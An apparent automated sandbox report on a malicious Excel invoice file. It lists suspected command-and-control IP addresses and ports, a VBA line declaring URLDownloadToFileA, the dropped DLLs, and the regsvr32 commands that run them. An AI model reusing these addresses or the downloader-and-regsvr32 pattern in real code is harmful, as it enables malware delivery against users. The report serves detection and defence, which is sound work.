Source: regsvr32.exe, 00000006.00000002.2433079529.0000000000350000.00000004.00000020.sdmp	String found in binary or memory: https://194.225.58.214/Y
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp	String found in binary or memory: https://198.57.200.100/
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp	String found in binary or memory: https://198.57.200.100/_
Source: regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp	String found in binary or memory: https://198.57.200.100:3786/
Source: regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp	String found in binary or memory: https://198.57.200.100:3786/&
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp	String found in binary or memory: https://198.57.200.100:3786/XE
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp	String found in binary or memory: https://198.57.200.100:3786/hy
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp	String found in binary or memory: https://211.110.44.63/
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp	String found in binary or memory: https://211.110.44.63:5353/
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp	String found in binary or memory: https://211.110.44.63:5353/8
Source: regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp	String found in binary or memory: https://69.164.207.140/
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp	String found in binary or memory: https://69.164.207.140/M
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp	String found in binary or memory: https://69.164.207.140/T
Source: regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp	String found in binary or memory: https://69.164.207.140:3388/
Source: regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp	String found in binary or memory: https://69.164.207.140:3388/7
Source: regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp	String found in binary or memory: https://69.164.207.140:3388/C
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp	String found in binary or memory: https://69.164.207.140:3388/JE
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp	String found in binary or memory: https://69.164.207.140:3388/hy
Source: regsvr32.exe, 00000006.00000002.2433198879.0000000000376000.00000004.00000020.sdmp, regsvr32.exe, 00000009.00000002.2433245753.0000000000409000.00000004.00000020.sdmp, regsvr32.exe, 0000000B.00000002.2452450039.00000000006F6000.00000004.00000020.sdmp, regsvr32.exe, 00000011.00000002.2503460777.000000000055E000.00000004.00000020.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 49185 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49302
Source: unknown	Network traffic detected: HTTP traffic on port 49265 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49288 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49300
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49222
Source: unknown	Network traffic detected: HTTP traffic on port 49294 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49265
Source: unknown	Network traffic detected: HTTP traffic on port 49181 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49220
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49264
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49263
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49185
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49184
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49181
Source: unknown	Network traffic detected: HTTP traffic on port 49281 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49176 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49191 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49298 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49237 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49275 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49214 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49184 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49302 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49220 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49259
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49214
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49211
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49298
Source: unknown	Network traffic detected: HTTP traffic on port 49190 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49176
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49251
Source: unknown	Network traffic detected: HTTP traffic on port 49319 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49250
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49294
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 49228 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49198 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49282 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49194 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49259 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49251 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49206
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49247
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49202
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49288
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49320
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown	Network traffic detected: HTTP traffic on port 49202 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49263 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49318 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49282
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49281
Source: unknown	Network traffic detected: HTTP traffic on port 49206 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49174 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49239 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49319
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49318
Source: unknown	Network traffic detected: HTTP traffic on port 49235 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49239
Source: unknown	Network traffic detected: HTTP traffic on port 49250 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49237
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49314
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49235
Source: unknown	Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49198
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49275
Source: unknown	Network traffic detected: HTTP traffic on port 49300 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49247 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49194
Source: unknown	Network traffic detected: HTTP traffic on port 49222 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49264 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49270
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49191
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49190
Source: unknown	Network traffic detected: HTTP traffic on port 49314 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49229 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49320 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49211 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49307 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49270 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49307
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49229
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49228

Source: unknown	HTTPS traffic detected: 64.37.52.172:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 103.83.81.27:443 -> 192.168.2.22:49169 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.136.54.91:443 -> 192.168.2.22:49184 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.185.224.50:443 -> 192.168.2.22:49191 version: TLS 1.2

System Summary:

Document contains an embedded VBA macro which may execute processes

Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function Print_Sheet_MAin, API Run("MegaA_sp")			Name: Print_Sheet_MAin
Source: VBA code instrumentation	OLE, VBA macro: Module Module1, Function Print_Sheet_MAin, API Run("MegaA_sp")			Name: Print_Sheet_MAin

Document contains an embedded VBA macro with suspicious strings

Source: 1_Total New Invoices-Thursday January 21_2021.xlsm	OLE, VBA macro line: Private Declare PtrSafe Function PrintData_1 Lib "urlmon" Alias "URLDownloadToFileA" ( ByVal pCaller As LongPtr, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As LongPtr, ByVal lpfnCB As LongPtr ) As Long
Source: 1_Total New Invoices-Thursday January 21_2021.xlsm	OLE, VBA macro line: Private Declare PtrSafe Function PrintData_1 Lib "urlmon" Alias "URLDownloadToFileA" ( ByVal pCaller As LongPtr, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As LongPtr, ByVal lpfnCB As LongPtr ) As Long
Source: 1_Total New Invoices-Thursday January 21_2021.xlsm	OLE, VBA macro line: Private Declare Function PrintData_1 Lib "urlmon" Alias "URLDownloadToFileA" ( ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long ) As Long
Source: 1_Total New Invoices-Thursday January 21_2021.xlsm	OLE, VBA macro line: Private Declare Function PrintData_1 Lib "urlmon" Alias "URLDownloadToFileA" ( ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long ) As Long

Found Excel 4.0 Macro with suspicious formulas

Source: 1_Total New Invoices-Thursday January 21_2021.xlsm	Initial sample: CALL
Source: 1_Total New Invoices-Thursday January 21_2021.xlsm	Initial sample: CALL
Source: 1_Total New Invoices-Thursday January 21_2021.xlsm	Initial sample: CALL
Source: 1_Total New Invoices-Thursday January 21_2021.xlsm	Initial sample: CALL

Office process drops PE file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Temp\nnmumzom.dll	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\hknmwj[1].zip	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\gjeicn6u9[1].rar	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\clh6qq[1].zip	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Temp\kxwni.dll	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\l3v7tq4[1].rar	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\or3peb[1].rar	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Temp\sxzjqf.dll	Jump to dropped file

Abnormal high CPU Usage

Source: C:\Windows\SysWOW64\regsvr32.exe

Process Stats: CPU usage > 98%

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76D20000 page execute and read and write

Document contains an embedded VBA macro which executes code when the document is opened / closed

Source: 1_Total New Invoices-Thursday January 21_2021.xlsm	OLE, VBA macro line: Private Sub World_time_Print_Layout(ByVal Index As Long)
Source: VBA code instrumentation	OLE, VBA macro: Module Sheet1, Function World_time_Print_Layout			Name: World_time_Print_Layout

Document contains embedded VBA macros

Source: 1_Total New Invoices-Thursday January 21_2021.xlsm

OLE indicator, VBA macros: true

Source: classification engine

Classification label: mal100.expl.evad.winXLSM@31/24@6/9

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$1_Total New Invoices-Thursday January 21_2021.xlsm

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRE3D9.tmp

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: 1_Total New Invoices-Thursday January 21_2021.xlsm

Virustotal: Detection: 27%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\kxwni.dll
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\kxwni.dll
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\uveoybvk.dll
Source: unknown	Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\kxwni.dll
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll
Source: unknown	Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll
Source: unknown	Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\jxacpz.dll
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll
Source: unknown	Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll
Source: unknown	Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\kxwni.dll	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\kxwni.dll	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\uveoybvk.dll	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\jxacpz.dll	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\kxwni.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Automated click: OK
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Automated click: OK
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Automated click: OK
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: 1_Total New Invoices-Thursday January 21_2021.xlsm	Initial sample: OLE zip file path = xl/media/image2.png
Source: 1_Total New Invoices-Thursday January 21_2021.xlsm	Initial sample: OLE zip file path = xl/media/image3.png
Source: 1_Total New Invoices-Thursday January 21_2021.xlsm	Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: 1_Total New Invoices-Thursday January 21_2021.xlsm	Initial sample: OLE zip file path = xl/worksheets/_rels/sheet3.xml.rels
Source: 1_Total New Invoices-Thursday January 21_2021.xlsm	Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: 1_Total New Invoices-Thursday January 21_2021.xlsm	Initial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
Source: 1_Total New Invoices-Thursday January 21_2021.xlsm	Initial sample: OLE zip file path = xl/printerSettings/printerSettings4.bin

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: 1_Total New Invoices-Thursday January 21_2021.xlsm

Initial sample: OLE summary subject = by C.H. Robinson

Source: 1_Total New Invoices-Thursday January 21_2021.xlsm

Initial sample: OLE indicators vbamacros = False

Data Obfuscation:

Registers a DLL

Source: unknown

Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\kxwni.dll

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Temp\nnmumzom.dll	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\hknmwj[1].zip	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\gjeicn6u9[1].rar	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\clh6qq[1].zip	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Temp\kxwni.dll	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\l3v7tq4[1].rar	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\or3peb[1].rar	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Temp\sxzjqf.dll	Jump to dropped file

Drops files with a non-matching file extension (content does not match file extension)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\l3v7tq4[1].rar	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\hknmwj[1].zip	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\gjeicn6u9[1].rar	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\or3peb[1].rar	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\clh6qq[1].zip	Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Windows\SysWOW64\regsvr32.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
